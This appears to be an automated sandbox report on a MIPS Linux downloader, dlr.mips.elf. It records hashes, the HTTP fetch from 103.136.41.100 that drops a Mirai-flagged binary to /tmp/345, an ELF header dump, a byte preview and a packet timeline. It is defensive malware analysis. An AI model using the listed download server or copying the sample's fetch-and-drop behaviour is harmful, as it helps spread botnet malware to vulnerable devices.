Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.mips.elf

Overview

General Information

Sample name:dlr.mips.elf
Analysis ID:1586161
MD5:ff7da44e11cd5a1ad06532ef66173ca2
SHA1:7288dcf07f32a3c535b076f9e39dd645c1a085ec
SHA256:07c5a29efa7987474eef1ed539b016b1ea731e5f6e0caac40ef0c96094eb6219
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1586161
Start date and time:2025-01-08 19:32:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.mips.elf
Detection:MAL
Classification:mal48.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: dlr.mips.elf
Command:/tmp/dlr.mips.elf
PID:6234
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
AAA
BAH
Standard Error:
  • system is lnxubuntu20
  • dlr.mips.elf (PID: 6234, Parent: 6159, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/dlr.mips.elf
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: /tmp/345Avira: detection malicious, Label: EXP/ELF.Mirai.Hua.a
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: global trafficHTTP traffic detected: GET /12 HTTP/1.1Host: 127.0.0.1Connection: closeUser-Agent: wget (dlr)
Source: 345.12.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 345.12.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/1@0/0
Source: /tmp/dlr.mips.elf (PID: 6234)File written: /tmp/345Jump to dropped file
Source: /tmp/dlr.mips.elf (PID: 6234)Queries kernel information via 'uname': Jump to behavior
Source: dlr.mips.elf, 6234.1.00007ffdf3eaf000.00007ffdf3ed0000.rw-.sdmpBinary or memory string: Bf(x86_64/usr/bin/qemu-mips/tmp/dlr.mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.mips.elf
Source: dlr.mips.elf, 6234.1.0000560502a8a000.0000560502b11000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/mips
Source: dlr.mips.elf, 6234.1.0000560502a8a000.0000560502b11000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
Source: dlr.mips.elf, 6234.1.00007ffdf3eaf000.00007ffdf3ed0000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
SourceDetectionScannerLabelLink
dlr.mips.elf3%ReversingLabsLinux.Downloader.Generic
SourceDetectionScannerLabelLink
/tmp/345100%AviraEXP/ELF.Mirai.Hua.a
/tmp/34529%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
SourceDetectionScannerLabelLink
http://127.0.0.1/120%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://127.0.0.1/12false
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://schemas.xmlsoap.org/soap/encoding/345.12.drfalse
    high
    http://schemas.xmlsoap.org/soap/envelope/345.12.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      103.136.41.100
      unknownIndia
      139884AGPL-AS-APApeironGlobalPvtLtdINfalse
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      103.136.41.100dlr.arm7.elfGet hashmaliciousUnknownBrowse
      • 127.0.0.1/6
      dlr.mpsl.elfGet hashmaliciousUnknownBrowse
      • 127.0.0.1/2
      109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
      • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
      91.189.91.43earm6.elfGet hashmaliciousMiraiBrowse
        2.elfGet hashmaliciousUnknownBrowse
          dlr.arm7.elfGet hashmaliciousUnknownBrowse
            main_x86.elfGet hashmaliciousMiraiBrowse
              m5.elfGet hashmaliciousUnknownBrowse
                uYtea.x86.elfGet hashmaliciousUnknownBrowse
                  uYtea.mpsl.elfGet hashmaliciousUnknownBrowse
                    uYtea.x86_64.elfGet hashmaliciousUnknownBrowse
                      main_x86_64.elfGet hashmaliciousMiraiBrowse
                        Aqua.arm5.elfGet hashmaliciousUnknownBrowse
                          91.189.91.42earm6.elfGet hashmaliciousMiraiBrowse
                            2.elfGet hashmaliciousUnknownBrowse
                              dlr.arm7.elfGet hashmaliciousUnknownBrowse
                                main_x86.elfGet hashmaliciousMiraiBrowse
                                  m5.elfGet hashmaliciousUnknownBrowse
                                    uYtea.x86.elfGet hashmaliciousUnknownBrowse
                                      uYtea.mpsl.elfGet hashmaliciousUnknownBrowse
                                        uYtea.x86_64.elfGet hashmaliciousUnknownBrowse
                                          main_x86_64.elfGet hashmaliciousMiraiBrowse
                                            Aqua.arm5.elfGet hashmaliciousUnknownBrowse
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CANONICAL-ASGBearm6.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              2.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              dlr.arm7.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              main_x86.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              m5.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              uYtea.sh4.elfGet hashmaliciousUnknownBrowse
                                              • 185.125.190.26
                                              uYtea.x86.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              uYtea.arc.elfGet hashmaliciousMiraiBrowse
                                              • 185.125.190.26
                                              uYtea.mpsl.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              uYtea.x86_64.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              CANONICAL-ASGBearm6.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              2.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              dlr.arm7.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              main_x86.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              m5.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              uYtea.sh4.elfGet hashmaliciousUnknownBrowse
                                              • 185.125.190.26
                                              uYtea.x86.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              uYtea.arc.elfGet hashmaliciousMiraiBrowse
                                              • 185.125.190.26
                                              uYtea.mpsl.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              uYtea.x86_64.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              AGPL-AS-APApeironGlobalPvtLtdINdlr.arm7.elfGet hashmaliciousUnknownBrowse
                                              • 103.136.41.100
                                              dlr.mpsl.elfGet hashmaliciousUnknownBrowse
                                              • 103.136.41.100
                                              2461ACFA271F7D477CA53ABE428D6ADDE1F285E115F18.exeGet hashmaliciousFFDroiderBrowse
                                              • 103.136.41.162
                                              wYWdigdSjn.exeGet hashmaliciousNeshtaBrowse
                                              • 103.136.42.153
                                              38b2c7a1af454d382927f81543d86055886bc02863457.exeGet hashmaliciousUnknownBrowse
                                              • 103.136.42.153
                                              l39HA25qjw.exeGet hashmaliciousManusCrypt, SocelarsBrowse
                                              • 103.136.42.153
                                              SecuriteInfo.com.Win32.Malware-gen.30674.exeGet hashmaliciousUnknownBrowse
                                              • 103.136.42.153
                                              file.exeGet hashmaliciousFFDroiderBrowse
                                              • 103.136.42.153
                                              qkOFMWXZmrGet hashmaliciousUnknownBrowse
                                              • 103.136.41.100
                                              njE4JoXEp6Get hashmaliciousUnknownBrowse
                                              • 103.136.41.110
                                              INIT7CHearm6.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              2.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              dlr.arm7.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              main_x86.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              m5.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              uYtea.x86.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              uYtea.mpsl.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              uYtea.x86_64.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              main_x86_64.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              Aqua.arm5.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              No context
                                              No context
                                              Process:/tmp/dlr.mips.elf
                                              File Type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                              Category:dropped
                                              Size (bytes):102688
                                              Entropy (8bit):5.522398154730104
                                              Encrypted:false
                                              SSDEEP:1536:S2+l0txozQ6cG5xJCsGpxGJKGmzPE6i3g/K5E3k74R+rYxK5ezjIJixGdWXsbdGf:B+KxozQBdpxCK1EIzm98aW
                                              MD5:A7C54F12667170713DBBC7A47D488A7F
                                              SHA1:61A899D36B58FA39843E90DA10CACD214A58AE50
                                              SHA-256:92C2CC623808C3AF0B3A42535B437572F7120D748012AA6C440799899736DB3B
                                              SHA-512:84D0A5D7B294849E3948F2802896CF377957A67DF1F56EC5BB5D5F4BD518256ED06C150498359ECB4AC1AC2CCE985C64EE991B5FE002CB61F261A12ED5B76DEB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 29%
                                              Reputation:low
                                              Preview:.ELF.....................@.p...4.........4. ...(.............@...@...........................E...E........38........dt.Q............................<...'......!'.....................<...'......!........'9... ......................<...'..h...!... ....'9k0. ..........................'.. <...'..0...!'..... .....................".p.....@.......................Y....... ..$B... ...............Y....... ..$B...........@..$................ ..$.......$....".p... ............'..(<...'..t...!'............h.....@.................h$.... ..$..t.........................@.........|..... ..$........ ..'.. ............'.. ...........!........<...'......!...!......'...$......$'.................................... ..........................<...'..p...!'..............................@.Y.. !......(!. ..$............@._........&.....(!. ..$...... .....@.d........&.. ..(!. ..$......0.....@.i........&..0..(!. ..$......@.....@.n........&..@..(!. ..$......P.....@.s........&..P..(!. ..$......`.....@.x....
                                              File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                              Entropy (8bit):4.556432867725662
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:dlr.mips.elf
                                              File size:11'676 bytes
                                              MD5:ff7da44e11cd5a1ad06532ef66173ca2
                                              SHA1:7288dcf07f32a3c535b076f9e39dd645c1a085ec
                                              SHA256:07c5a29efa7987474eef1ed539b016b1ea731e5f6e0caac40ef0c96094eb6219
                                              SHA512:29deeb592319208f483a2d9e1b76ca5fc3094d47d71c918cae03bff0d64000b51d0002a874cac4f8d1c963acef903a6e315358babf18394bdb5f2d9d828567fb
                                              SSDEEP:96:2NUPrA9SDROEREOExDxEXigEsEa4L9lrpynLojU5HfNuIusbrXTIU13t7DX7KgnV:LJYQDmxQ5Z9YnU5/NuIuscIr1npGD/5G
                                              TLSH:223215492A31DBFAF55DD53447B3CA20668476B22AA0C648F15CEB4C0FB038E655E7F8
                                              File Content Preview:.ELF.....................@.....4..*......4. ...(....p........@...@...........................@...@........................ ..D ..D ........P........dt.Q.................................................D..<...'......!'.......................<...'......!...

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, big endian
                                              Version:1 (current)
                                              Machine:MIPS R3000
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:UNIX - System V
                                              ABI Version:0
                                              Entry Point Address:0x4002b0
                                              Flags:0x1007
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:4
                                              Section Header Offset:10916
                                              Section Header Size:40
                                              Number of Section Headers:19
                                              Header String Table Index:18
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .reginfoMIPS_REGINFO0x4000b40xb40x180x180x2A004
                                              .initPROGBITS0x4000cc0xcc0x8c0x00x6AX004
                                              .textPROGBITS0x4001600x1600x1ba00x00x6AX0016
                                              .finiPROGBITS0x401d000x1d000x5c0x00x6AX004
                                              .rodataPROGBITS0x401d600x1d600x22c0x00x2A0016
                                              .eh_framePROGBITS0x4420000x20000x40x00x3WA004
                                              .ctorsPROGBITS0x4420040x20040x80x00x3WA004
                                              .dtorsPROGBITS0x44200c0x200c0x80x00x3WA004
                                              .jcrPROGBITS0x4420140x20140x40x00x3WA004
                                              .dataPROGBITS0x4420200x20200x700x00x3WA0016
                                              .gotPROGBITS0x4420900x20900x1400x40x10000003WAp0016
                                              .sdataPROGBITS0x4421d00x21d00x40x00x10000003WAp004
                                              .sbssNOBITS0x4421d40x21d40x80x00x10000003WAp004
                                              .bssNOBITS0x4421e00x21d40x700x00x3WA0016
                                              .commentPROGBITS0x00x21d40x20a0x00x0001
                                              .mdebug.abi32PROGBITS0x20a0x23de0x00x00x0001
                                              .pdrPROGBITS0x00x23e00x6400x00x0004
                                              .shstrtabSTRTAB0x00x2a200x840x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              <unknown>0xb40x4000b40x4000b40x180x180.98340x4R 0x4.reginfo
                                              LOAD0x00x4000000x4000000x1f8c0x1f8c4.89500x5R E0x10000.reginfo .init .text .fini .rodata
                                              LOAD0x20000x4420000x4420000x1d40x2503.01210x6RW 0x10000.eh_frame .ctors .dtors .jcr .data .got .sdata .sbss .bss
                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 8, 2025 19:32:51.715681076 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:51.720609903 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:51.720710993 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:51.721743107 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:51.726562977 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320096016 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320194960 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.320342064 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320385933 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.320404053 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320449114 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.320453882 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320488930 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.320513964 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320555925 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.320573092 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320585966 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320621967 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320626020 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.320632935 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320633888 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.320657969 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.320658922 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.320691109 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.320691109 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.324987888 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.325006962 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.325030088 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.325040102 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.407840967 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.407879114 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.407887936 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.407898903 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.407988071 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.407988071 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.407988071 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.407989025 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.408158064 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.408169031 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.408178091 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.408214092 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.408225060 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.408236027 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409099102 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409110069 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409120083 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409133911 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409145117 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409862041 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409872055 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409882069 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409895897 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409907103 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.409918070 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.410691977 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.450001001 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.450040102 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.450050116 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.450870991 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.495872021 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.495883942 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.495893955 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.495912075 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.495922089 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.495935917 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.495939970 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.495950937 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.496062994 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.496397018 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.496408939 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.496426105 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.496437073 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.496448040 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.496459961 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.496471882 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.497169971 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.497234106 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.497245073 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.497266054 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.497277021 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.497288942 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.497302055 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.498063087 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.498106956 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.498121977 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.498135090 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.498177052 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.498195887 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.498207092 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.498218060 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.498938084 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.498959064 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.498970032 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.499063015 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.499073982 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.499083996 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.499099016 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.500474930 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.500751019 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.500763893 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.500775099 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.500787020 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.502681017 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.537801027 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.537823915 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.537836075 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.537846088 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.537857056 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.537863970 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.539839983 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.585187912 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.585200071 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.585210085 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.585220098 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.585231066 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.585239887 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.585242033 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.585256100 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.585264921 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.586947918 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:52.587229013 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.619966984 CET3375280192.168.2.23103.136.41.100
                                              Jan 8, 2025 19:32:52.624763966 CET8033752103.136.41.100192.168.2.23
                                              Jan 8, 2025 19:32:54.100779057 CET43928443192.168.2.2391.189.91.42
